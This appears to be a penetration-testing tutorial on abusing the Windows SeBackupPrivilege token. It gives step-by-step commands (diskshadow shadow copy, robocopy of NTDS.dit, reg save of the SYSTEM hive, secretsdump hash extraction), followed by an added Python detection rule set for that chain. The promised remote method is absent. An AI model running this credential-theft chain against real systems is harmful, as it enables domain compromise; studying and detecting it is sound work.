Welcome to this post, where we will see how to exploit the «SeBackupPrivilege» token. We will see how to exploit it manually inside the compromised machine and, as a second method, remotely from our attacker machine.
First of all, here is an introduction to tokens in Windows:
Each user logged onto the system holds an access token with security information for that logon session. The system creates an access token when the user logs on. Every process executed on behalf of the user has a copy of the access token. The token identifies the user, the user’s groups, and the user’s privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
I got the description from HackTricks.
The second description we will need is about «SeBackupPrivilege»:
The system is caused to grant all read access control to any file (limited to read operations) by this privilege. It is utilized for reading the password hashes of local Administrator accounts from the registry, following which, tools like «psexec» or «wmiexec» can be used with the hash (Pass-the-Hash technique). However, this technique fails under two conditions: when the Local Administrator account is disabled, or when a policy is in place that removes administrative rights from Local Administrators connecting remotely.
I got the description from HackTricks.
Once we know what each of these means, we can proceed to exploit the token:
Check for tokens/privileges – check for SeBackupPrivilege:
whoami /priv
Since the user has been assigned the SeBackupPrivilege token, I can back up the system:
- Backup script saved as «diskshadow.txt»:
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "set metadata C:\Windows\Temp\meta.cab" | out-file ./diskshadow.txt -encoding ascii -append
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
- Execute it with diskshadow:
diskshadow /s diskshadow.txt
Copy the NTDS.dit file from the exposed shadow copy with robocopy (the /b switch is backup mode, which is exactly what SeBackupPrivilege enables):
robocopy /b Z:\Windows\ntds . ntds.dit
Save the SYSTEM registry hive, which is needed to decrypt the hashes stored in NTDS.dit:
reg save hklm\system c:\Users\d.chambers\Documents\system.bak
Download both files to the attacker machine and extract the hashes with Impacket's secretsdump.py:
secretsdump.py -ntds ntds.dit -system system.bak -hashes lmhash:nthash LOCAL
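As an added defender's example (not part of the original post), here is a small Python check that flags the command chain above in process-creation events: a scripted diskshadow run, a robocopy /b copy of ntds.dit and a reg save of the SYSTEM hive. The event records and usernames are constructed for illustration, and a user is only flagged when two or more of the steps appear, because a lone robocopy /b is routine for legitimate backup software and holding SeBackupPrivilege by itself (e.g. Backup Operators) is not a signal.

```python
import re

# Constructed sample process-creation events (Security 4688 / Sysmon 1 style),
# reduced to the two fields the detection needs. Not real logs.
SAMPLE_EVENTS = [
    {"user": "CORP\\d.chambers", "cmd": "whoami /priv"},
    {"user": "CORP\\d.chambers", "cmd": r"diskshadow /s diskshadow.txt"},
    {"user": "CORP\\d.chambers", "cmd": r"robocopy /b Z:\Windows\ntds . ntds.dit"},
    {"user": "CORP\\d.chambers", "cmd": r"reg save hklm\system C:\Users\d.chambers\Documents\system.bak"},
    {"user": "CORP\\backupsvc", "cmd": r"robocopy /b D:\Data E:\Backup /mir"},   # benign backup job
    {"user": "CORP\\jdoe", "cmd": "notepad.exe report.txt"},
]

# One regex per step of the chain, matched case-insensitively against the command line.
RULES = [
    ("diskshadow_scripted", re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I)),
    ("robocopy_backup_ntds", re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b.*\bntds\.dit\b", re.I)),
    ("reg_save_system_hive", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
]


def match_rules(cmd):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def detect(events):
    """Map each user to the set of chain steps seen in their process creations."""
    hits = {}
    for ev in events:
        for name in match_rules(ev["cmd"]):
            hits.setdefault(ev["user"], set()).add(name)
    return hits


def suspicious_users(events, min_rules=2):
    """Users who performed at least min_rules distinct steps of the chain."""
    return sorted(u for u, names in detect(events).items() if len(names) >= min_rules)


if __name__ == "__main__":
    for user, steps in detect(SAMPLE_EVENTS).items():
        print(f"{user}: {sorted(steps)}")
    print("suspicious:", suspicious_users(SAMPLE_EVENTS))
```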
I hope you find this post useful in your engagements.
Happy Hacking!